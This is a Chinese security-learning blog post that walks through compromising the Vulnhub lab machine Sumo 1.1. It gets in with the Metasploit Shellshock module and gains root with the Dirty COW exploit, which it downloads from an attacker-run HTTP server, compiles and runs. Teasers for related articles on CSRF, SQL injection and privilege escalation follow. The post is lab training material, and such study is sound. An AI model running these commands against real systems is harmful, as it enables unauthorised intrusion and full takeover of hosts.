[網絡安全學習篇78]:Sumo: 1.1 Vulnhub 實戰(髒牛漏洞提權)

原創 buglige 2020-06-15 23:26

往期博文:

[網絡安全學習篇69]:滲透測試實戰-DC-1-靶機入侵

[網絡安全學習篇70]:滲透測試實戰-DC-2-靶機入侵

[網絡安全學習篇71]:滲透測試實戰-DC-3-靶機入侵

[網絡安全學習篇72]:滲透測試實戰-DC-4-靶機入侵

[網絡安全學習篇73]:滲透測試實戰-DC-5-靶機入侵

[網絡安全學習篇74]:滲透測試實戰-DC-6-靶機入侵

[網絡安全學習篇75]:滲透測試實戰-DC-7-靶機入侵

[網絡安全學習篇76]:滲透測試實戰-DC-8-靶機入侵

[網絡安全學習篇77]:滲透測試實戰-DC-9-靶機入侵

[網絡安全學習篇78]:Sumo: 1.1 Vulnhub 實戰(髒牛漏洞提權)(本篇)

下期博文:

[網絡安全學習篇79]:Geisha: 1 Vulnhub 實戰

目錄

網絡掃描

攻擊

髒牛-提權

拿到flag

網絡掃描

arp-scan -l

nmap -A 192.168.1.174 -p-

nikto 掃描網站漏洞

nikto -h http://192.168.1.174

攻擊

使用msf 查找此漏洞的攻擊模塊

 

use exploit/multi/http/apache_mod_cgi_bash_env_exec

set RHOSTS 192.168.1.174

set TARGETURI /cgi-bin/test

exploit

髒牛-提權

掃描是否存在髒牛漏洞腳本scan-dirtycow.sh

https://github.com/aishee/scan-dirtycow/blob/master/dirtycowscan.sh

exp:dirty.c

https://www.exploit-db.com/raw/40839

kali 本地開啓http 服務

python -m SimpleHTTPServer

遠程訪問kali 並下載腳本文件,掃描,發現存在髒牛漏洞

wget http://192.168.1.164:8000/scan-dirtycow.sh

chmod 777 scan-dirtycow.sh

./scan-dirtycow.sh

漏洞利用

遠程下載exp,編譯

wget http://192.168.1.164:8000/dirty.c

chmod 777 dirty.c

gcc -pthread dirty.c -o dirty -lcrypt

拿到flag

./dirty testpasswd

su firefart

testpasswd

參考博文:

https://cyb3rbl0g.github.io/sumo-vulnhub-walkthrough/

https://www.vulnhub.com/

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

短信驗證碼字典腳本

f = open('/Users/superzedlv/Desktop/yanzhengma.txt','w') start = 0000 end = 10000 print len(str(end)) b = '' #line

SuperZedLv 2020-07-08 05:30:22

滲透入門知識-CSRF漏洞原理到實戰

什麼是CSRF漏洞? 跨站請求僞造,就是黑客以被攻擊者的名義發送請求,完全合規合法。 CSRF原理 A站點存在CSRF漏洞、B站點爲黑客僞造包含A站點正常請求鏈接的站點。 1)當被攻擊者打開A站點,進行身份驗證,登陸成功。A站點服

SuperZedLv 2020-07-08 05:30:22

滲透測試入門知識-文件上傳漏洞原理到實戰

文件包含漏洞原理 程序開發人員一般會把重複使用的函數寫到單個文件中,需要使用某個函數時直接調用此文件,而無需再次編寫,這種文件調用的過程一般被稱爲文件包含。通過函數包含文件時,由於沒有對包含的文件名進行有效的過濾處理,被攻擊者利用

SuperZedLv 2020-07-08 05:30:22

安全漏洞從原理到實戰--命令執行漏洞

01 命令執行漏洞 即黑客可以通過控制參數執行系統命令,形成原因是開發人員對用戶輸入參數安全檢查不足從而導致的惡意命令執行。 02 常見的系統命令執行函數 Php命令執行函數eval()函數、assert()、preg_repla

SuperZedLv 2020-07-08 05:30:21

越權漏洞修復參考

0x00 背景   https://www.xx.com/service/order.do?orderid=2280582085200280582 上圖,選擇orderid作爲參數, 越權遍歷爬取其他人的信息,類似選擇某個參數或者某個接口

煜铭2011 2020-07-08 02:03:38

短信轟炸漏洞修復

0x00 漏洞背景 短信轟炸攻擊時常見的一種攻擊,攻擊者通過網站頁面中所提供的發送短信驗證碼的功能處,通過對其發送數據包的獲取後,進行重放,如果服務器短信平臺未做校驗的情況時,系統會一直去發送短信,這樣就造成了短信轟炸的漏洞。 攻擊者通過

煜铭2011 2020-07-08 02:03:38

內網滲透(上)

每日一句: 做安全,有一定實力的話。找工作,待遇不好就不要去,不要委屈求全。 世界上好地方那麼多,不出去看看的話,你就以爲這就是世界 另外,二進制其實也不是多值錢的玩意,沒必要覺得多深奧 聲明: 內網滲透

划水的小白白 2020-07-08 00:37:05

XCTF的easytornado題目

py是個好工具,要多加以利用 ![在這裏插入圖片描述](https://img-blog.csdnimg.cn/20200707170254527.png?x-oss-process=image/watermark,type_Z

001000001000 2020-07-08 00:12:42

Netcat安裝使用詳解

Netcat 從網絡的一段讀取數據,輸出到網絡的另一端(可以使用於TCP和UDP協議)   安裝 Windows可自行在github上下載netcat kali linux上 方法一: sudo yum install n

想冲大厂的癞蛤蟆 2020-07-07 11:59:33

phpmyadmin後臺getshell方法學習總結

0x00 前言 最近看的一篇文章中提到過phpmyadmin一些後臺getshell方式,就想着寫篇博客學習總結一下~~ 0x01 getshell方法 一、select into outfile直接寫入 1.利用條件 對web

0nc3 2020-07-07 09:51:37

Day8——提權學習之第三方軟件G6-FTP提權

0x00 G6-FTP簡介 G6 FTP Server 新一代的 FTP 服務器端軟件,支持 RFC-959 標準並增強其中的某些功能,上傳和下載都可以續傳,實時查看運行狀態,佔用帶寬,還有很多功能。 G6-FTP的默認端

0nc3 2020-07-07 09:51:37

Day9——提權學習之第三方軟件FileZilla提權

0x00 FileZilla簡介 FileZilla是一個免費開源的FTP軟件,分爲客戶端版本和服務器版本,具備所有的FTP軟件功能。 FileZilla的默認端口爲14147,只偵聽在127.0.0.1的14147端口

0nc3 2020-07-07 09:51:27

Day5——提權學習之MSSQL數據庫提權學習總結

0x00 SQLServer提權基礎 1、SQLServer權限 列出sql server 角色用戶的權限 按照從最低級別角色(bulkadmin)到最高級別角色(sysadmin)的順序進行描述: 1.bulkadmin:這個

0nc3 2020-07-07 09:51:27

sql注入技巧

堆疊注入 改變大小寫 寬字節 雙寫注入 截斷注入 se%lect 繞過安全狗 se/**/lect繞過 `param`繞過 rename和alter改變表的數據結構 預編譯{ Set @sql = CONCAT(‘se’,‘lec

001000001000 2020-07-07 07:50:31

XCTF題目 supersqli 的做題思路

在輸入框提交後瀏覽器自動進行URL編碼。若在hackbar中,則需要手動進行URL編碼。 嘗試: 1’ – 顯示結果 於是修改爲 1’# 顯示: 正常情況下輸入 一: 1 二: 1' and 1=1

001000001000 2020-07-07 07:50:31